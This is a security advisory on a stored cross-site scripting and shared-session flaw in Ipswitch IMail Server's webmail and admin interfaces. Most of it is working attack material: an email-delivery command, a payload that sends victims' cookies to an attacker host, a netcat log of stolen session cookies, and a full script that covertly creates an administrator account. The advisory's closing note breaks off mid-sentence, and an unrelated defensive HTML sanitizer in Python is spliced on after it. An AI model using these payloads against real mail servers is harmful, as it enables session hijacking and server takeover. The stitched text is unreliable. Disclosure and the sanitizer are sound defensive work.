SSD Advisory – IMail Cross Site Scripting

SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries.
Introduction
IMail Server is a Windows Email Server designed specifically for the small-to-medium sized business.
Vulnerability Details
A persistent, unauthenticated cross-site scripting vulnerability, combined with a cross-authentication issue, in the IClient web interface and the IAdmin web interface of Ipswitch IMail Server allows attackers to execute arbitrary code in the victim's browser. As shown below, this allows the creation of a new user whenever the attack is triggered against the administrator of the system.

Example 1
On the “A” machine we create an email containing JavaScript code and send it to admin@10.0.8.12. This is the JS placed in the body of the mail:

<IMG SRC=/ onerror="alert(document.cookie)"></IMG>

We use the sendEmail script to send the crafted data, but Telnet could also be used to deliver the XSS code.
Before sending the email, we put the JavaScript code inside a file (for example /tmp/test.txt) and then send the mail:
sendEmail -t admin@10.0.8.12 -f cookie@10.0.8.12 -s 10.0.8.12 -u "Cookie" -o message-file=/tmp/test.txt message-content-type=html
When admin@10.0.8.12 logs in to the web client
[image: imail_image_1]
and opens the email, or the preview pane is activated (the default in IMail Server), the script runs:
[image: imail_image_2]
Example 2
This is the JS injected via email; it sends the victim's cookies and the current URL to a host under our control:

<IMG SRC=/ onerror='document.location.replace("http://10.0.8.11/post.asp?name=victim1&message=" + document.cookie + "<br>" + "URL:" + document.location);'></IMG>

On the “A” machine we start a listener and grab the cookie (the IMailCookie and iMailUserInfo values below are the victim's session data as received by the listener):

root@bt-CPT:~# nc -lvp 80
listening on [any] 80 ...
192.168.244.130: inverse host lookup failed: Unknown server error : Connection timed out
connect to [10.0.8.11] from (UNKNOWN) [10.0.8.12] 49463
GET /post.asp?name=victim1&message=cookietest=ok;%20IMailCookie=33C97320442B1A76A16472B59CDE9F129B05E1D30EA7C228373113 D7C9A63B227C0E03AB543B265FFC0FAEDC565002262781898AF46F87E5E2EDBF010207A9039AC73B34206434FC16A24B55FC444EBE5BCE357614221297 954D7FD0D140C5715F55ABA50F20351CD59B2A333D0F01E51CCD697F11E00A3B16BF7AD2035480D8814580FFC50E6B72CBBBE7340D32E2A6DF32922DE8 8CA950146FA4D538EDBA4A2AFA469CE079447BFE2A107D0130EA4D;%20iMailUserInfo=e0l%2b9%2fkzxoYE5wrxNaCdHDr4%2bOgpAj7RWNRxVLcHh1A% 3d=3%2bJwUhovTIXvxT%2fe4U%2bjuQ%3d%3d&ixxUbrgcXSqcSaJ9p%2bsBnJ1ISks0ur46BtpG2zJUwx0%3d=3%2bJwUhovTIXvxT%2fe4U%2bjuQ%3d %3d;%20iMailUserLanguage=en-US;%20AdminCulturePref=en-US;%20ReadingPaneVarSize=312<br>URL:http://127.0.0.1/IClient/Pages/Mailbox.aspx?TabId=d4225e22-1798-4d7c-83b2-7f9615ab569a HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Referer: http://127.0.0.1/IClient/Pages/Mailbox.aspx?TabId=d4225e22-1798-4d7c-83b2-7f9615ab569a
Accept-Language: it-IT
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 192.168.244.133
Connection: Keep-Alive

In the next case we will not use the cookie simply to hijack the session, but will also try to directly create an administrator user on the IMail Server. This can be done using another design issue of IMail Server: cross authentication. The IMail web client does not implement separate session management for the web IClient (the web email client interface) and the web IAdmin (the web IMail Server administration interface). So, if an admin is authenticated on the web IClient, he is also considered authenticated on the administration web console present on the same web server.
The IAdmin console can be reached both from the IClient and by pointing directly to http://IMAILSERVER/IAdmin, and it shares the session with the web IClient.
Example 3
Since the XSS runs in the context of the user who activates the script, if the mail is displayed by an admin, I can execute operations in his session using the cross-session authentication.
So, the tasks of my script will be:

  • Activate the cross authentication by pointing to http://10.0.8.12/IClient/pages/IAdmin.aspx
  • Wait some seconds
  • Execute somepage.aspx + POSTDATA

In this case we will use the UserCreate.aspx page in order to create a new user with full privileges.
Here is the full code that must be sent via email:

<!-- START -->
<!-- Here is the complete and working script. It creates an admin user called 'Peru' with password 'asdasd' -->
<!-- This activates the cross authentication to the web IAdmin -->
<IMG SRC=/ onerror="
window.open('http://10.0.8.12/IClient/pages/iadmin.aspx');
"></img>
<!-- This grabs the __VIEWSTATE and the __EVENTVALIDATION from the iframe (the UserCreate.aspx page) placed at the end of the script.
Then it sends the POSTDATA and creates the user. A sleep of 5 seconds is needed for the iframe to load -->
<img src=\ onerror="
setTimeout(function(){
            var divElement = document.getElementById('iframeId').contentWindow.document.getElementById('__VIEWSTATE');
            var divElement1 = document.getElementById('iframeId').contentWindow.document.getElementById('__EVENTVALIDATION');
            var views = divElement.value;
            var event = divElement1.value;
            window.onload = postwith('http://10.0.8.12/IAdmin/imail/UserCreate.aspx',{'__EVENTTARGET':'ctl00$ButtonsPlaceHolder$scbSaveCancel$ctl00', '__VIEWSTATE':views, '__EVENTVALIDATION':event, 'ctl00$ContentPlaceHolder2$txtUserID':'Peru', 'ctl00$ContentPlaceHolder2$txtFullName':'Peru', 'ctl00$ContentPlaceHolder2$txtPassword':'asdasd', 'ctl00$ContentPlaceHolder2$txtConPassword':'asdasd', 'ctl00$ContentPlaceHolder2$drpMaxMailboxSize':'Unlimited', 'ctl00$ContentPlaceHolder2$drpMaxMailBoxSizeUnit':'b', 'ctl00$ContentPlaceHolder2$drpMaxMsgs':'Unlimited', 'ctl00$ContentPlaceHolder2$drpEncoding':'utf-8', 'ctl00$ContentPlaceHolder2$chkEnablePassChange':'on', 'ctl00$ContentPlaceHolder2$chkGrantAccountAccess':'on', 'ctl00$ContentPlaceHolder2$chkAccessInfoServices':'on', 'ctl00$ContentPlaceHolder2$chkAccessLDAPServices':'on', 'ctl00$ContentPlaceHolder2$chkEnableWebCal':'on', 'ctl00$ContentPlaceHolder2$chkEnableIIM':'on', 'ctl00$ContentPlaceHolder2$chkEnableWebAccess':'on', 'ctl00$ContentPlaceHolder2$chkListAdmin':'on', 'ctl00$ContentPlaceHolder2$chkDomAdmin':'on', 'ctl00$ContentPlaceHolder2$chkSysAdmin':'on', 'ctl00$ContentPlaceHolder2$chkEnableRemoteMail':'on'})
            },5000);
function postwith (to,p) {
                  var myForm = document.createElement('form');
                  myForm.method='post' ;
                  myForm.action = to ;
                  for (var k in p) {
                                var myInput = document.createElement('input') ;
                               myInput.setAttribute('name', k) ;
                              myInput.setAttribute('value', p[k]);
                            myForm.appendChild(myInput) ;
                          }
                  document.body.appendChild(myForm) ;
                  myForm.submit() ;
                  document.body.removeChild(myForm) ;
            }
"></img>
<!-- This iframe loads UserCreate.aspx to allow __VIEWSTATE and __EVENTVALIDATION extraction -->
<!-- This iframe must be at the end of the script because an unclosed tag is used to bypass the filter -->
<iframe src="http://10.0.8.12/IAdmin/imail/UserCreate.aspx" id="iframeId" style="display:none"
<!-- END -->

Note that everything in the POSTDATA can be obtained in a test environment and added to the script.
In this case we add a user, but one could equally capture in the test environment the POSTDATA of “Deleting a mail domain” and add it to the script.
Also note that some parameters like “__VIEWSTATE” differ between installations. The JS above is written to grab the correct __VIEWSTATE at run time, but some browsers ask for confirmation before loading external content:
[image: imail_image_3]
In the next image you can see the whole exploit:
[image: imail_image_4]
From the management console (not the web IAdmin) you can see that only one active user is present:
[image: imail_image_5]
The content of the email and the sendEmail script:
[image: imail_image_6]
The email reaches the inbox folder:
[image: imail_image_7]
When activated, the user Peru is created (Firefox 38.0.5).
Note
There are several ways to bypass the control in the webmail: an XSS input filter was implemented, but only the tag
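As an added defensive example (not part of the advisory and not IMail's code), the following Python allow-list sanitizer shows the check a webmail should apply to HTML mail bodies before rendering them: it keeps only known tags and attributes, drops every on* event handler and every non-http(s)/mailto/cid URL, and, because the parser still reports an unclosed tag as a tag, the trailing <iframe trick is neutralised too. The tag and attribute sets and the fixtures (cut down from Examples 1 and 3 above plus a benign mail) are assumptions constructed for this example.

```python
from html import escape
from html.parser import HTMLParser

# Illustrative allow-lists; a real webmail would maintain a much longer set.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "a", "img", "div", "span", "table", "tr", "td"}
VOID_TAGS = {"br", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
SAFE_URL_PREFIXES = ("http://", "https://", "mailto:", "cid:")


class MailSanitizer(HTMLParser):
    # Rebuilds the body from scratch instead of searching for bad tag names.
    def __init__(self):
        super().__init__()
        self.out, self.findings = [], []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:  # iframe, script, object ... closed or not
            self.findings.append(f"dropped tag <{tag}>")
            return
        kept = []
        for name, value in attrs:
            value = (value or "").strip()
            if name.startswith("on"):  # every event handler, not only onerror
                self.findings.append(f"dropped event handler {name} on <{tag}>")
            elif name in ("href", "src") and not value.lower().startswith(SAFE_URL_PREFIXES):
                self.findings.append(f"dropped unsafe {name}={value!r} on <{tag}>")
            elif name in ALLOWED_ATTRS.get(tag, ()):  # style, id, class ... are dropped silently
                kept.append(f' {name}="{escape(value)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))  # text is re-escaped and can never become markup
    # HTML comments get no callback here, so they are dropped as well.


def sanitize(body):
    # Returns (clean_html, findings); a non-empty findings list is worth logging.
    parser = MailSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out), parser.findings


# Constructed fixtures: Example 1, a cut-down Example 3 (img onerror plus the unclosed <iframe), benign mail.
EXAMPLE_1 = '<IMG SRC=/ onerror="alert(document.cookie)"></IMG>'
EXAMPLE_3 = ('<img src=\\ onerror="window.open(\'http://10.0.8.12/IClient/pages/iadmin.aspx\');"></img>\n'
             '<iframe src="http://10.0.8.12/IAdmin/imail/UserCreate.aspx" id="iframeId" style="display:none"\n'
             '<!-- END -->')
BENIGN = '<p>Hi <b>team</b>, see <a href="https://example.com/report">report</a><br></p>'
```

Running sanitize() over the three fixtures yields a bare <img> for Example 1, no onerror handler or <iframe at all for Example 3, and the benign mail unchanged with an empty findings list.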